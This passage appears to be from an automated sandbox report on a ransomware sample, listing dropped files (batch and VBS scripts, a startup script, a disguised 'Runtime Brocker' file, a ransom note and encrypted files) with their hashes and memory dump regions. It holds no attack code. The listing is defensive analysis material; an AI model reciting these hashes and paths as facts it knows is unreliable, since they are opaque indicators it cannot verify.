                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\seDGsMXwV7.bat
                                        Filesize

                                        263KB

                                        MD5

                                        c3c6e228bbc935a2d9d9bd91e331d02b

                                        SHA1

                                        c37f3872bb8fa411abe41662237a63c7b29a44c0

                                        SHA256

                                        41bdc1d19af1b9e2c09e4d126d4090ddc1d20b7ecb68ab98cc936f74267e0d8d

                                        SHA512

                                        5e912ebc795eeb1b0a72953847ca30129c8303f43f7fe4549e91ba0e7e31c23deb333e433e709e6bc3ad5dd3be3825bc727d3583c549c713cb5eaca995769aa3

                                        Download Submit

                                      • C:\Users\Admin\AppData\Local\Temp\seDGsMXwV7.vbs
                                        Filesize

                                        78B

                                        MD5

                                        c578d9653b22800c3eb6b6a51219bbb8

                                        SHA1

                                        a97aa251901bbe179a48dbc7a0c1872e163b1f2d

                                        SHA256

                                        20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2

                                        SHA512

                                        3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\Runtime Brocker
                                        Filesize

                                        442KB

                                        MD5

                                        04029e121a0cfa5991749937dd22a1d9

                                        SHA1

                                        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                        SHA256

                                        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                        SHA512

                                        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                        Download Submit

                                      • C:\Users\Admin\AppData\Roaming\startup_str_446.vbs
                                        Filesize

                                        115B

                                        MD5

                                        6558c6686281816c191a2230a6d61c7a

                                        SHA1

                                        ed827c768aa12765f8519ee3c8c43fa737628a16

                                        SHA256

                                        960bb87b17605a23bd33ece997ef9d6a31ec379f7096d3e9353d1ed361390e5b

                                        SHA512

                                        c31e96322cabd3f81bf2f44dbfbd2547e39b0a9443edb5ac29ea415fd538bffcd2877195bd1d3a1c1a403c4adedb6c6b6ba52ce999d49911ecd6c37abf77bfa0

                                        Download Submit

                                      • C:\Users\Admin\Desktop\How To Decrypt My Files.html
                                        Filesize

                                        639B

                                        MD5

                                        d2dbbc3383add4cbd9ba8e1e35872552

                                        SHA1

                                        020abbc821b2fe22c4b2a89d413d382e48770b6f

                                        SHA256

                                        5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be

                                        SHA512

                                        bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66

                                        Download Submit

                                      • C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
                                        Filesize

                                        16B

                                        MD5

                                        ef89901c83aad08f53b3f52813b35563

                                        SHA1

                                        ef4b20710bee019704fd1f86622b74f914df5ec9

                                        SHA256

                                        417d8d678a24770918a7aab359ee32e94a3569ae0258e0ef10fe664d35d8eb24

                                        SHA512

                                        0eb84069c88d6e23c0b349fbf5f354f1335b23e44f86c755812d7bc38adbd460f129bd69a7697c610c2a7fcc3ce501dc8bf201d5bd7a4b082fbc794d03a151e5

                                        Download Submit

                                      • memory/1992-49-0x0000019F57650000-0x0000019F57660000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/1992-67-0x0000019F3D0E0000-0x0000019F3D0EC000-memory.dmp

                                        Filesize

                                        48KB

                                        Download

                                      • memory/1992-54-0x0000019F57C10000-0x0000019F57C1C000-memory.dmp

                                        Filesize

                                        48KB

                                        Download

                                      • memory/2532-18-0x0000022C6A890000-0x0000022C6A8C4000-memory.dmp

                                        Filesize

                                        208KB

                                        Download

                                      • memory/2532-50-0x00007FFCCEC10000-0x00007FFCCF6D1000-memory.dmp

                                        Filesize

                                        10.8MB

                                        Download

                                      • memory/2532-17-0x0000022C6A880000-0x0000022C6A888000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2532-16-0x00007FFCCEC10000-0x00007FFCCF6D1000-memory.dmp

                                        Filesize

                                        10.8MB

                                        Download

                                      • memory/2532-15-0x00007FFCCEC10000-0x00007FFCCF6D1000-memory.dmp

                                        Filesize

                                        10.8MB

                                        Download

                                      • memory/2532-10-0x0000022C6A620000-0x0000022C6A642000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/2532-4-0x00007FFCCEC13000-0x00007FFCCEC15000-memory.dmp

                                        Filesize

                                        8KB

                                        Download

                                      • memory/4440-66-0x000001BCF84E0000-0x000001BCF8556000-memory.dmp

                                        Filesize

                                        472KB

                                        Download

                                      • memory/4440-65-0x000001BCF8050000-0x000001BCF8094000-memory.dmp

                                        Filesize

                                        272KB

                                        Download